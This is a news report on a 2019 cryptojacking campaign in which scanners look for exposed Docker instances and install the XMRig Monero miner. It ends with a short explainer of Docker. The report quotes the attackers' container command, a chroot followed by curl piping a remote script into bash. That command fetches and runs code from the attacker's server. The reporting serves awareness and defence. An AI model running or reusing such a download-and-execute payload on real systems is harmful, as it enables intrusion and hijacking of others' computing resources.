According to security researchers at Bad Packets, the scans, which began over the weekend, identify vulnerabilities that allow bad actors to inject malicious code that deploys a cryptocurrency miner on a company’s Docker instances, ZDNet reports.
These scans create a container using an Alpine Linux image, and execute the payload via:“Command”: “chroot /mnt /bin/sh -c ‘curl -sL4 https://t.co/q047bRPUyj | bash;’”,#threatintel pic.twitter.com/vxszV5SF1o — Bad Packets Report (@bad_packets) November 25, 2019 Troy Mursch, chief researcher and co-founder of Bad Packets, told ZDNet this type of activity is quite common. However, this campaign was unique because of its size. Researchers are yet to get to grips with the entire scope of the campaign. However, as it stands, the attack is scanning over 59,000 IP networks looking for vulnerable Docker instances. When an exposed instance is found, the below line of code is run. This downloads a further script from the attacker’s server which then installs a cryptocurrency mining bot, Monero miner XMRig. In the few days since hackers started scanning for exposed Docker instances, more than 14.8 Monero has been mined, about $740 worth, Mursch added.
A quick bit on Docker
If you’re not into enterprise software you might not know what Docker is, but one of TNW’s devs explained it to me as a “virtual container” in which you can run other virtual machines. Docker itself isn’t a virtual machine though, it’s sandbox environment and does need some resources from the host machine to run properly. It lets devs package applications and run them in virtual environments. You can read this explainer for more information.